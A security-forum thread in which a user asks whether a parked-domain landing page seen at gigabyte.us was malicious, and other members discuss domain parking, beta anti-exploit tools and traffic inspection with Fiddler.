Jump to content

Recommended Posts

Last night i went to www.gigabyte.us which is the website for the hardware manufacturer. I was directed to a strange looking network solutions landing page. The guy in the thread on hardforum below got the same thing.

http://hardforum.com/showthread.php?p=1040654103

I thought it was pretty strange so i started trying to figure out the reasons it would happen. DNS issues came up a lot.

However i also found out how half a million of network solutions parked domain pages were serving malware back in 2010 Using iframe injection and drive by downloads.

I cant get the network solutions landing page to come up again. The url was www.gigabyte.us and www.gigabyte.com. The site seems back to normal.

Does anyone have any insights to this sort of issue? Thats a pretty weird looking landing page. Im not sure if its real or fake, malicious or not.

Link to post
Share on other sites

I don't see anything weird and I don't see a Network solutions "landing page".

 

Wrote too soon.    :(

 

Domain expires on 2/12/2023

gigabyte.com.zip

 

The web site is "parked".  Maybe the server is down or something "else" such as transitioning to

 

This is the Gigabyte US site

http://www.gigabyte.us

 

This is the Taiwanese site

http://www.gigabyte.tw

 

 

 

 

 

Link to post
Share on other sites

Thanks. I have EMET and mbae as well as mbam pro and they didnt say anything. Ran mbar too.

Just seemed a bit odd that it would advertize singles and adult chat on a Network Solutions landing page when a graphics card makers site was parked lol.

Googling Network Solutions has made me really paranoid now though. I founds on the NS official facebook that tons of people who host their sites through NS are currently having DNS and mail issues with them.

And i found out about the old exploit launching widget that 500,000 of their parked domains were infecting people with in 2010.

Link to post
Share on other sites

Thanks. I have EMET and mbae as well as mbam pro and they didnt say anything. Ran mbar too.

MBAR - Means nothing.

MBAE - Means nothing.

 

Results from Beta software can not be used to draw conclusions.  MBAE has too many bugs and shouldn't be used unless you are a paid Beta Tester.  Using it outside that role will create a False Sense of Security.   The proof is YOU post lauding "...mbae...didnt say anything".

Additionally if you visit a web page, running MBAR is just not needed.  One runs an anti rootkit application IFF there is cause for suspicion of an actual infection based upon perceived or actual observed misbehaviour.

 

Additionally...

Researchers bypass protections in Microsoft's EMET anti-exploitation tool

 

As for the page actually rendered, that's normal for a page parking a Domain.  Nothing but fluff advertisements so if one does visit the page at least the host gets affiliate revenue if one "clicks" on URLs on said page.

 

Example:

My friend Ian Kenefick (Cork Ireland) had a web site called Ian Kenefick Computer Security with the Domain IK-CS.Com  It is also "parked" and awaits a buyer.  It even states "For Sale, Click For Details".  Look at it and you'll see the similarities.  Of course just because the page is a parking page does NOT mean that one of the advertisers *may* host content not unlike the one you were pissed-off over at Skype.

 

http://ik-cs.com/

Link to post
Share on other sites

David:

 

Thank you for the additional information. I don't let myself have a false sense of security, regardless of what software I'm using. I pretty much don't trust anything or anyone, and hope someone with the required knowledge and skill can analyze the entire source code of that web page.

 

With regard to what software I use, I don't know of anything better at blocking exploits than MBAE, EMET, always having things like Flash Player and Java updated(Java is disabled for browsers). I try to keep myself protected with stuff that actually works, but I know just about any security software can be defeated, as the article you linked to proves.

 

You make it sound like MBAE and MBAR are useless, because they're in beta, and not to bother using them. From what I've read here, and various other places, they're pretty effective, despite being in beta. Perhaps you can elaborate further as to why I shouldn't use them?

 

Firefox:

 

Yes, I found some weird stuff on their Facebook and blogs indicating problems, but they're very vague, and don't give any details. I know they've been compromised by malware before(back in 2010), but I'm not sure what's going on. People who don't have websites with them don't have access to post in their forums, so I can't even find out if the landing page that people going to the Gigabyte site are getting is from them or not.

Link to post
Share on other sites

You don't get it.

 

In reference to Beta software with something like Audacity you can use it and some things might not function right but the software will most likely work for the main purpose, manipulation of audio files, with some parts not totally working correctly.  But at the same time, because it is Beta, you might spend an hour transforming some waveform and the programs crashes losing all your work.  With software that supposed to protect a system or protect a system of systems then it just shouldn't be used.  It is like using a Beta version of a prophylactic.  It hasn't been thoroughly tested and under certain circumstances uses of said prophylactic can still lead to an unwanted pregnancy.

 

Using an Anti RootKit application in the role you described is like using a voltmeter to test a car battery and then saying the whole car tests OK.  The problem is an Anti RootKit application is an On Demand scanner with a specific but small spectrum target range.  For example the web site could use obfuscated JavaScript.  Neither MBAE or MBAR is flag flag that.  MBAE may flag the ACTION of a Buffer Overflow with an Elevation of Privileges but that is very unlikely in this scenario.  Since it is Beta software there is the possibility that if there was such an action then MBAE could fail in that regard BECAUSE it is not fully functional, yet, and that is WHY it is still in beta.

 

EDIT:

 

On the other hand, a more appropriate check would be to use Fiddler and examine the captured code and associated HTTP activity.  Of course that is not an automatic scanner that gives a judgmental declaration based on its findings.  It requires the user to have a level of knowledge and experience to to make a judgment call.

Link to post
Share on other sites

understand why beta software isnt preferable to a ful release version but i dont know of any other exploit mitigation than it and EMET that would be better. The condescending tone is unnecessary. Suggestions for alternatives would be appreciated. Thats why im here.

I understand that the antirootkit is only designed to look for rootkits.

Thats why i also bought Mbam Pro and update several times daily, have Mbae as well as EMET, and i use a lot of the other tools recommended by experts on this forum. I read reputable security news and try to keep up with new threats.

I do use tools that require some level of knowledge and i like to learn how to use new ones. I monitor connections with TCPView, have looked for suspicious activity by using Autoruns and Process Monitor as well as some other Sysinternals tools like Process Explorer with Virus Total hash comparison features enabled in an attempt to be aware of whats going on. I set up my operating system the most secure way i know how to and constantly look for ways to improve it.

I dont know what fiddler is but i am going to figure it out after i post this. Did you find obfuscated javascript that does something malicious on that landing page or was that only an example of what Mbae would miss?

I cant exactly have a Fire Eye style virtual machine endpoint on my main PC so im trying to keep it safe using the best practices and software i know. I am not a programmer or a security expert but i try to be as informed as possible. I know no one is safe with all of the expensive and sophisticated APTs that exist today, with dedicated hardware much worse than NebuAd was. I know that even with the latest full release version endpoint solutions people get compromised. I am open to suggestions and im here to learn, as i said.

Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.